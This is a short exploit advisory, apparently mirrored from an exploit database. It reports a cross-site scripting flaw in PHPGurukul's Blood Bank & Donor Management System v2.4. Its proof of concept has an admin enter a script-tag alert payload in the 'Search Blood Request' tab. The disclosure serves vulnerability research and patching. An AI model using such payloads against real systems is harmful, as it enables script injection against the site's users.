## https://sploitus.com/exploit?id=PACKETSTORM:190322
# Exploit Title: Blood Bank & Donor Management System v2.4 - Cross Site Scripting (XSS)
    # Date: 2025-04-07
    # Exploit Author: Mehmet Can Kadıoğlu a.k.a mao7un
    # Vendor: https://phpgurukul.com/blood-bank-donor-management-system-free-download/
    # Demo Site: http://localhost/BBDMS-Project-PHP-V2.4/bbdms
    # Tested on: Kali Linux
    # CVE: N/A
    
    PoC:
    
    1. Log in as admin.
    2. Go to the "Search Blood Request" tab and enter this XSS payload:
    
    <script>alert(1337)</script>